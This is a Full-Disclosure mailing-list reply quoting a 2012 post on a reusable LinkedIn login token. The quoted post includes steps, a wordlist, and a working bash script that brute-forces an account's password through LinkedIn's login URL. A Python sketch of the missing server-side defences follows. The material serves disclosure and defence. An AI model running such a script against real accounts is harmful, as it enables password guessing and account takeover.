Where's the CSRF? All I see here is a useless brute-force attack.

2012/5/17 Fernando A. Lagos B. <[email protected]>
> LinkedIn uses a token in the login form which can be used many times
> for different usernames. You can do it using the same IP or different
> IPs, the token will not be verified.
>
> I. Step by step
> ===============
> 1). Login into your LinkedIn account and capture the "sourceAlias" and
> "csrfToken" variables (example:
>
> sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)
>
> 2). Use the token to login into another account:
>
> https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&[email protected]&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless
>
> session_key is the username and session_password is the password.
>
> 3). The password (session_password) is not correct if the requested URL
> returns "The email address or password you provided does not match our
> records", else the password is correct.
>
> II. PoC
> =======
>
> 1). The wordlist (filename: w)
> [zerial@belcebu ~]$ cat w
> asdfgh
> zxcvbnm
> 1234567
> 0987654
> 12345698
> 456_4567
> 123456qwert
> qwsdcv
> 12wedfgh
> 123456qwerty
> 12345qwei
> 112233
> [zerial@belcebu ~]$
>
> 2). Executing the script:
> [zerial@belcebu ~]$ sh linkedin.sh [email protected] w
> Password found: qwsdcv
> [zerial@belcebu ~]$
>
> This is the correct password for this test user.
>
> III. Script
> ===========
>
> #!/bin/bash
> #
> # usage: ./linkedin.sh [email protected] wordlist
> #
>
> TOKEN="ajax%3A6265303044444817496"
> sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"
>
> if [ ! -f $2 ];
> then
> echo "file $2 does not exist"
> exit
> fi
>
> _USR=$1
> for _PWD in $(cat $2);
> do
> if [ $(echo -n $_PWD|wc -c) -lt 6 ];
> then
> echo "Ignoring $_PWD (must be greater than 6 chars)";
> continue
> fi
> wget -o /dev/null -O - "https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless"|grep 'The email address or password you provided does not match our records\|captcha' >>/dev/null
> if [ $? -eq 1 ];
> then
> echo "Password found: $_PWD"; exit;
> fi
> done
>
> echo "Password NOT found. Try later."
> #EOF
>
> More info (in Spanish):
>
> http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/
>
> cheers,
> --
> Fernando A. Lagos Berardi
> Information Security
> GNU/Linux User #382319
> Blog: http://blog.zerial.org
> Jabber: [email protected]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
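As an added example (my own, not part of Fernando's post or LinkedIn's code), here is the server-side shape of the two controls the post shows missing, in Python: the csrfToken is bound to the session that rendered the login form, so a token captured in one session fails verification in any other, and failed attempts are counted per account so a wordlist run reaches the captcha response instead of the "does not match our records" string the script keys on. The key, salt, user store and function names are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed values for the example; a real deployment keeps the key out of source.
SERVER_KEY = b"constructed-server-secret-not-for-production"
MAX_FAILURES = 5  # failed logins per account before the captcha branch is taken

# Constructed user store holding PBKDF2 hashes, never plaintext passwords.
_SALT = b"constructed-salt"
USERS = {
    "user@example.com": hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 100_000),
}


def issue_csrf_token(session_id: str) -> str:
    """Issue a token keyed to the session that rendered the login form."""
    nonce = secrets.token_hex(8)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Accept the token only for the session it was issued to (the check the post shows absent)."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


class LoginEndpoint:
    """Stand-in for /uas/login-submit with per-account failure counting."""

    def __init__(self):
        self.failures = {}

    def login_submit(self, session_id, csrf_token, session_key, session_password):
        if not verify_csrf_token(session_id, csrf_token):
            return "csrf-mismatch"  # token reused from a different session
        if self.failures.get(session_key, 0) >= MAX_FAILURES:
            return "captcha"  # response no longer distinguishes right from wrong
        digest = hashlib.pbkdf2_hmac("sha256", session_password.encode(), _SALT, 100_000)
        stored = USERS.get(session_key)
        if stored is not None and hmac.compare_digest(digest, stored):
            self.failures.pop(session_key, None)
            return "ok"
        self.failures[session_key] = self.failures.get(session_key, 0) + 1
        return "bad-credentials"
```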